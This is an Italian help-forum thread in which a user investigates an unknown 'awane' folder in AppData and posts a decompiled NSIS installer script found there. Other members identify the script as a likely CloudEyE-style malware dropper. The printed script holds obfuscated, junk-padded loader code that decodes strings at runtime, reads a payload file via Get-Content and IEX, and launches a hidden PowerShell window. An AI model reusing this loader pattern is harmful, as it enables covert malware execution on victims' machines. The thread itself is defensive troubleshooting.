cartella -awane- in c\utenti\mionome\appdata\local

[p060477]

salve
mi trovo una cartella di nome awane che contiene altre sottocartelle con nomi strani tipo :
misconstruct, grugus,hulled,Sanna116 etcc...
in c\utenti\nomemiopc\appdata\local
ho cercato in google ma non trovo nulla...
potreste darmi un aiuto?
grazie in anticipo
buon fine settimana

[maurotramonti]

Probabilmente è una semplice cartella di file temporanei/dati applicazioni come tutte le altre presenti in AppData, perciò non dovrebbe essere malevola né darti problemi. Al massimo, se vuoi essere sicuro al 100%, fai una scansione con il tuo antivirus. In ogni caso, è buona norma non andare a toccare i file e le cartelle gestiti dal sistema, motivo per cui AppData è una cartella nascosta

[p060477]

grazie
scansioni tutte ok!
ma è strana...ci sono nomi strani dentro e sottocartelle di cose che non ho mai scaricato ne cercato in internet...
21mb di roba...accesa il 15.5...insomma non mi torna assolutamente...e poi strano che su google non si trovi nulla....
grazie ancora della vostra preziosa attenzione

[maurotramonti]

ma è strana...ci sono nomi strani dentro e sottocartelle di cose che non ho mai scaricato ne cercato in internet...
21mb di roba...accesa il 15.5...insomma non mi torna assolutamente...

Probabilmente i nomi sono strani per noi utenti "normali", mentre invece per le applicazioni che usano questi file sono assolutamente sensati e comprensibili. Dato che il peso è tutto sommato modesto (21 MB per un computer di oggi non è nulla) ti suggerirei di lasciare perdere questa cartella dato che non dà particolari problemi.

[crazy.cat]

In effetti è sconosciuta come cartella.
Che file ci sono al suo interno?
Vedi qualche file di log o di testo per capire chi possa averla creata?
O qualche eseguibile su cui fare tasto destro del mouse e leggere nelle proprietà di cosa si tratta?

[p060477]

Grazie Crazy.Cat
nessun file eseguibile e nessun file di log
l'unico file di testo ha come nome Urmenneskernes.txt
e questo e' il suo interno:

Codice: Seleziona tutto

hulkortsoperatoer preparoccipital irrupting psykopaten legaliserende forbundskanslernes radrensende wheelbases dommeres forhistories cappuccinoernes chiver
adolphs antipodeans angelsaksiskes vandlbsadministrationerne prehend smuthullets.nonpersuasively nonannexable kompeni pecksniffianism bnlig undisestablished pemphixes brachycephales selena analyserbart
prikkers modstandsdygtigst switchgear corridas erhvervssygdomsudvalgets prebridal imperfektummerne proctospasm loekkesaetninger revselsens
photofloodlamp programspecifikationens repossessor protuberancy kirkeinventar udkkede kommens luxemburgeres printerks
colaen haarskkenes kennedy kogechokoladernes.

mettendo tutto in google si vede che la lingua prevalente è il danese e sembrerebbero frasi o nomi senza alcun collegamento
e ripeto non ho scaricato installato o visto sul web nulla di simile...

[crazy.cat]

Google translate dice:

"operazioni con schede perforate preparoccipitale irrompere lo psicopatico legalizzare gli interassi della cancelliera la preistoria dei giudici l'erba cipollina dei cappuccini
adolphs antipodeans anglosassoni waterlbs amministrazioni prehend scappatoie.non convincente nonannexable compeni pecksniffianism benevolo non stabilito pemfissi brachycephales selena analizzabile
punture i quadri più resistenti corride imperfezioni prematrimoniali del comitato delle malattie professionali proctospasmo frasi conclusive rimprovero
specifica del programma lampada fotoproiettore protuberanza del repossessore inventario della chiesa selezionato commens stampanti lussemburghesi
la cola dei capelli torte il kennedy dei cioccolatini da cucina."

Puoi postare una immagine dei file che ci sono al suo interno?
Neanche una dll?

[p060477]

grazie crazy.cat
si avevo già messo nel translate e visto quella accozzaglia di cose strane e senza alcun senso o collegamento...
no nessuna dll

ecco tutti i files contenuti nelle sue sottocartelle:

[crazy.cat]

Non ho idea di cosa siano.
Butta via tutto per me.

[p060477]

Grazie Crazy.cat
l'ultimo tentativo che ho fatto è sul file .nsi
ho provato ad aprirlo su un sito on line che apre tali files,
https://filext.com/it/online-file-viewer.html
ecco il risultato :

;NSIS_POWERSHELL!
;@@@@@@@@@@@@@@@@@@ DECLARED VAR @@@@@@@@@@@@@@@@@@
Var mercantilelykno
Var Ferrocyanhydrichemim
Var mindernewrestinglysku
Var politiseringengadit
Var heteroalbumosevi
Var Explainunsympath
Var Trkkortsankermandens
Var Alkaliseretelufs
Var Rensdyrlavernespaedagog
Var barbaricallyhoreungen
Var massivesteslackeyship
Var tilkaldelsetransakt
Var flormeletsprogfo
;@@@@@@@@@@@@@@@@@@ DECLARED VAR @@@@@@@@@@@@@@@@@@

!include "MUI2.nsh"

SetCompressor LZMA

;!define MUI_ICON icona.ico

Icon "C:\Program Files (x86)\CloudEyE\ResHack\tmpextracted\\MBSetup 5_128.ico"

;The name of the installer

Name "Subscapular"

;The file to write

OutFile "C:\Users\administrator\Desktop\Overrider.exe"
VIAddVersionKey "LegalCopyright" "ALLTEL Corporation"
VIAddVersionKey "FileDescription" "Mentor Graphics"
VIAddVersionKey "ProductVersion" "2.3.0.0"
VIProductVersion "2.3.0.0"


;Request application privileges for Windows Vista

RequestExecutionLevel user

; Build Unicode installer

Unicode true

; The default installation directory

InstallDir $LOCALAPPDATA\awane\misconstruct\

InstProgressFlags colored ;TRASH
BrandingText "Halvbuens"
ComponentText "Konsekvensen" ;TRASH

MiscButtonText "karantnes" ;TRASH
;--------------------------------
AddBrandingImage left 77 ;TRASH

InstProgressFlags colored ;TRASH
BrandingText "Monoxyla"
InstallColors (5E2264 839C78) ;TRASH

DetailsButtonText "Periangioma" ;TRASH
BrandingText "Purpurigenous"
CompletedText "Rigsdalers233" ;TRASH

InstallDirRegKey HKLM Software\Telefax\lawbooks myriapods ;TRASH
;Pages
LicenseForceSelection checkbox "Josephines" ;TRASH

ShowUninstDetails hide ;TRASH
Page instfiles

Page components

Page directory

UninstPage uninstConfirm

UninstPage instfiles

;--------------------------------

Var Buffer

Var Index

Var StringaDec

Var BufferCarattere

Var Nullo

; The stuff to install


Function DecAndCall

StrCpy $StringaDec $Nullo

StrCpy $Index $Nullo

StrCpy $Alkaliseretelufs 8255 ;TRASH
IntOp $Index $Index + 15;PAD_STRING_JUNK
DeleteRegKey /ifempty HKCU "Software\skolelrer\kvajhoved" ;TRASH

Loopa:

IntOp $Index $Index + 10 ;JUNKBLOCK

SetAutoClose False ;TRASH
FileRead $massivesteslackeyship $tilkaldelsetransakt ;TRASH
StrCpy $BufferCarattere $R6$Buffer$R6 1 $Index

StrCmp $R6$BufferCarattere $Nullo done

ExpandEnvStrings $barbaricallyhoreungen "%spilopmagerne%\merse\Rmebladene" ;TRASH
StrCpy $StringaDec $7$4$StringaDec$BufferCarattere 254
IfRebootFlag unresignedly klarskov ;TRASH
unresignedly: ;TRASH
Exch $Trkkortsankermandens ;TRASH

klarskov: ;TRASH

Call Increment

Goto Loopa
SetShellVarContext all ;TRASH

DeleteRegKey /ifempty HKLM "Software\Delplanen101" ;TRASH
done:

Push $StringaDec

FunctionEnd

Section "Petrolized"

SetOutPath $INSTDIR

GetCurInstType $politiseringengadit ;TRASH
IfFileExists "$INSTDIR\grugrus\interpapillary.Abd" FOUND NOTFOUND ;SHELL_PATH_ETICHETTA

NOTFOUND:

SetOutPath $INSTDIR\grugrus ;TRASH
File "C:\Program Files (x86)\CloudEyE\Projects\interpapillary.Abd"
File "C:\Program Files (x86)\CloudEyE\Projects\Nematologist.Sma" ;FILE_VITALE
File "C:\Program Files (x86)\CloudEyE\Projects\Cannelloni234.ink"
File "C:\Program Files (x86)\CloudEyE\Projects\Initiativrig.dri"
SetOutPath $INSTDIR\Oversigstabellerne ;TRASH
File "C:\Program Files (x86)\CloudEyE\Projects\Urmenneskernes.txt"
File "C:\Program Files (x86)\CloudEyE\Projects\behandlingstid.ana"
File "C:\Program Files (x86)\CloudEyE\Projects\brmes.vga"
SetOutPath $INSTDIR\Hulled\Garvesyren ;TRASH
File "C:\Program Files (x86)\CloudEyE\Projects\homozygosis.wro"
SetOutPath $INSTDIR\Physiophilosophical\Diaskop ;TRASH
File "C:\Program Files (x86)\CloudEyE\Projects\rdstrmpens.var"
File "C:\Program Files (x86)\CloudEyE\Projects\rundstykkerne.mal"
File "C:\Program Files (x86)\CloudEyE\Projects\slinget.aut"
File "C:\Program Files (x86)\CloudEyE\Projects\viewer.ema"
SetOutPath $INSTDIR\Sanna116\Cystocele\Opinionslederne\Unmeltedness ;TRASH
File ""


CreateFont $mindernewrestinglysku "Times New Roman" "8039" "31999" /UNDERLINE ;TRASH


CreateDirectory "$PICTURES\Afsyrings\overfringens" ;TRASH


SendMessage $Ferrocyanhydrichemim ${WM_SETTEXT} 0 0 ;TRASH
FOUND:

StrCpy $5 'Opdatering"' ;NOJUNKPAD;STRINGA_IN_CHIAROStrCpy $5 '_JUNKCRYPT_"_JUNKCRYPT_' ;NOJUNKPAD

strcpy $8 "$INSTDIR\grugrus\Nematologist.Sma" ;POWERSHELL_SCRIPT_PATH

StrCpy $2 " Balancer.$,lbrightanTUndespondeoHvalbarderrTrdendescivBynkergammemaleatesfetAnthologiss.lennocyst=Guardantsp$Premons,raFRetnings,naH.dyskorrorNedslidte.nNiviel.aspeSkopudseresGrundvrdie.Rremas ineS Bsselbetsu.osenbrneobStressors.STrustilysttA.uanafinjrVolumi smeiFiske enssnFlekstid.ugB,dehttess( Vin,bagpr6Kbslogesdk0 Roma.izer2Konkretise1.namouring4Regnskabsl, Forflygti3 Encapsule)" ;NOJUNKPAD;STRINGA_IN_CHIAROStrCpy $2 "_JUNKCRYPT_$VARIABILE1=$VARIABILE0.SubString(@POSIZIONE_IEX@,3)_JUNKCRYPT_" ;NOJUNKPAD
GetErrorLevel $heteroalbumosevi ;TRASH

StrCpy $Buffer "Politikerens Do$5eksigibelj$.rndboringFSyn.sbekenaCrematesinrByelawtiltnSamspilsmneSpillereg,sKo mandoty=SugeskaaleGMellowsmereNed ivningtundiscussa-HelgissmaaC Knuthantio Ra.iomenknAssemblerrtLagopode,aeBeaksjowern,osterodortRenseanlg. Penrackaut'";STRINGA_IN_CHIAROStrCpy $Buffer "_JUNKCRYPT_$5$VARIABILE0=Get-Content '_JUNKCRYPT_"

Call DecAndCall

pop $6

StrCpy $6 $6$8

StrCpy $Buffer "printkor.ektur narelairya'Materialpr;$2begynd.qui;Beatifiedu.Eutoniscer$PalaeoecolTAllumettekoLngs,lsfulrMealybugstv egligesabe TantaliantNonhomiletsSpringgrav(Lymphoblas$DistanceblFcheselipsuaSprogflelsr Eternitien TegnebrtaeTilmeldingsHenlevesaf)$5";STRINGA_IN_CHIAROStrCpy $Buffer "_JUNKCRYPT_';$2;.$VARIABILE1($VARIABILE0)$5_JUNKCRYPT_"

Call DecAndCall

pop $3

Push "condoles sy,bo $5StrubelaagpSkr ldsugeoPositionsnwReisolateueOhiathroatrBemgeflutesHol oaingchSenegaleseeU,venerabllPhallismqulNudlersmic.Sc rchingee Malapp.opxundervgtige$5Meselrytwi Formbrdene-BeskedernewErogentsysi Tralleskunsels abelidPapaphobisoantitrombowTiresfrimrsMayhapsskotRisperlakiyEmbedsfrell,hilisauceeVandlbsre, NemoricolohB.fenylerniRibzubasovdForflygtigdForte hydre Spaankurvn";STRINGA_IN_CHIAROPush "_JUNKCRYPT_$5powershell.exe$5 -windowstyle hidden_JUNKCRYPT_"

Pop $Buffer

Call DecAndCall

Pop $Buffer

Exec "$R6$Buffer $6$3"

;ExecShell "open" $buffer "$6$8$3" SW_HIDE

;ExecWait "$Buffer $6$8$3"

;nsExec::Exec "$Buffer $6$8$3"

;Pop $0

;nsExec::ExecToLog "$Buffer $6$8$3"

;Pop $0

;nsExec::ExecToStack "$Buffer $6$8$3"

;Pop $0
${ForEach} $Explainunsympath 445 12 - 2 ;TRASH
ReadRegDWORD $mercantilelykno HKCU "Software\Microsoft\Windows\strstedel\Uninstall\braendsel" "Eftergjorte" ;TRASH
SetFileAttributes "$COMMONFILES\silet.bri" HIDDEN ;TRASH
${Next} ;TRASH


;Pop $0

SectionEnd

Function Increment

Exec '"$FONTS\scribaciousness.pat"' ;TRASH
IntOp $Index $Index + 1
WriteRegBin HKCU "Software\archchronicler" "forelagtes" FF7A582D ;TRASH
SetFileAttributes "$STARTMENU\Berejse122.Dam" READONLY ;TRASH
IfFileExists $RESOURCES\nonelite\maagernes.stn bersaerkere Drawees111 ;TRASH
bersaerkere: ;TRASH
Quit ;TRASH

Drawees111: ;TRASH

${ForEach} $flormeletsprogfo 80 10 - 4 ;TRASH
SetRegView 32 ;TRASH
ExpandEnvStrings $Rensdyrlavernespaedagog "%Medbyggerens%\isbjerges" ;TRASH
CopyFiles $TEMPLATES\masterships\lighthandedness.lai $PROGRAMFILES\unpulvinated.und ;TRASH
${Next} ;TRASH

FunctionEnd

ci capisco assai poco...ma ,ad es,
in c\program files (86) quelle cartelle cloudeye menzionate io non le avrei...
e neppure le chiavi menzionate nel regedit in HKLM o HKCU...
grazie ancora per l'attenzione

[Zigul]

Guardando il contenuto delle cartelle, il file più grande, è un GED di circa 14 MB; pare sia l'estensione di un file utilizzato principalmente per delineare la genealogia (ma forse è usato anche da altri programmi). Gran parte dei file hanno come data ultima modifica il 26/12/23 ore 19:50, tranne alcuni che hanno 22/03/24 ore 13:25; tali date ricordano qualcosa? Ci sono programmi (poco usati suppongo) che sono stati installati il giorno dopo Natale, l'anno scorso? Se si apre quel file icona, "icons.ico" online (qui ad esempio) l'immagine è familiare?
Nel dubbio, il consiglio di crazy.cat, taglia la testa al toro.

P.s.
Dubito possa essere pertinente, ma alcuni elenchi di parole apparentemente non correlate, fra cui "awane", compaiono nella sezione "Extracted strings" in un paio di malware analizzati dal sito hybrid-analysis (v. primo e secondo report). Comunque non salterei a conclusioni affrettate, perché è un sito non adatto ai deboli di cuore e spesso troppo scrupoloso e sospettoso nell'analisi; oltre al fatto che la parola "awane" di per sé è un indizio fin troppo vago.

[p060477]

grazie anche a Zigul
mi sa che ci siamo incrociati con le risposte
ho appena postato il contenuto del file .nsi che mi pare interessante anche se io non avrei tali tracce menzionate sul mio pc
ecco il file .ico:


grazie ancora per il vostro aiuto

[Zigul]

Come avrai già verificato, l'icona è questa.
Per quanto riguarda le cartelle citate nello script, forse è solo omonimia, ma CloudEye è anche il nome di questo malware o, per essere più esatti, un programma (a pagamento) che potrebbe essere usato anche per proteggere malware (v. qui).
Lo script attiva PowerShell nascondendone la finestra, interagisce con il registro, produce "overrider.exe" nel desktop del profilo admin, etc. Resta vero che se non facesse nulla, non sarebbe certo in AppData; tuttavia i nomi di fantasia delle cartelle, l'insolito contenuto dei file e l'impossibilità di risalire ad un programma di riferimento, potrebbero alla fine essere indicatori di qualcosa di potenzialmente malevolo... basta cancellare tutto e finisce lì? Non sempre è così; magari è solo qualche traccia stramba di qualche vecchio programma di cui non hai memoria, ma considera che di certo questa non è una consulenza professionale (non ne ho le competenze). Se al tuo posto avessi un buon backup, per stare senza pensieri, reinstallerei tutto da zero (Windows compreso), ma è appunto solo un'opinione personale.

[p060477]

Grazie davvero Zigul
ho fatto scansioni sia con il mio antivirus, che con f secure,mcafee stinger e eset on line scanner e tutti mi direbbero che il pc non ha malware...
l'icona poi è veramente incredibile...è una pennetta...di una marca e con un logo che io non ho mai usato...
strano che sia proprio in tale awane folder....
grazie davvero per il vostro prezioso aiuto